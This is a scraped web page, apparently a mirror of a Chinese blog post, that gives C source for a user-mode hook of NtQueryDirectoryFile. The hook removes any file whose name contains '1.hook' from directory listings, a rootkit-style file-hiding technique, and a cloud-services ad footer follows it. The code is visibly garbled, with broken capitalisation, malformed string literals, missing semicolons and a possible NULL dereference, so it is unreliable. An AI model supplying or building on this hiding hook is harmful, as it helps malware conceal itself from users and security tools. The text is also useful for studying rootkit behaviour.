NTSTATUS WINAPI hook_ntquerydirectoryfile (in HANDLE filehandle,in HANDLE Event OPTIONAL,
In Pio_apc_routine apcroutine optional,in PVOID apccontext OPTIONAL,
Out Pio_status_block iostatusblock,out PVOID fileinformation,
In ULONG fileinformationlength,in File_information_class Fileinformationclass,
In Boolean returnsingleentry, in punicode_string FileName optional,in BOOLEAN restartscan)
{
NTSTATUS status=status_success;
Status=oldntquerydirectoryfile (filehandle,event,apcroutine,apccontext,\
Iostatusblock,fileinformation,fileinformationlength,\
Fileinformationclass,returnsingleentry,filename,restartscan);
if (! Nt_success (Status))
{
return Status;
}
//////////////////////////////////
if (Filebothdirectoryinformation==fileinformationclass)
{
file_both_directory_information* Pfileinfo = (file_both_directory_information*) fileinformation;
file_both_directory_information* plastfileinfo = NULL;
BOOL Blastflag=false;
Do
{
blastflag=! (Pfileinfo->nextentryoffset);
if (Null!=wcsstr (pfileinfo->filename,l "1.hook"))
{
OutputDebugStringW (L "target found");
if (blastflag)//link Table last file
{
plastfileinfo->nextentryoffset=0;
Break
}
Else
{
int iPos = (ULONG) Pfileinfo-(ULONG) fileinformation;
int ileft = (ULONG) fileinformationlength-ipos-pfileinfo->nextentryoffset;
Rtlcopymemory ((PVOID) Pfileinfo, (PVOID) ((char *) Pfileinfo + pfileinfo->nextentryoffset), ileft);
Continue
}
}
Plastfileinfo=pfileinfo;
Pfileinfo= (Pfile_both_directory_information) ((char*) pfileinfo+pfileinfo->nextentryoffset);
}while (!blastflag);
}
return Status;
}
Http://www.cnblogs.com/lzjsky/archive/2010/12/01/1892702.html
Ring3 Hook ntquerydirectoryfile hidden file
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
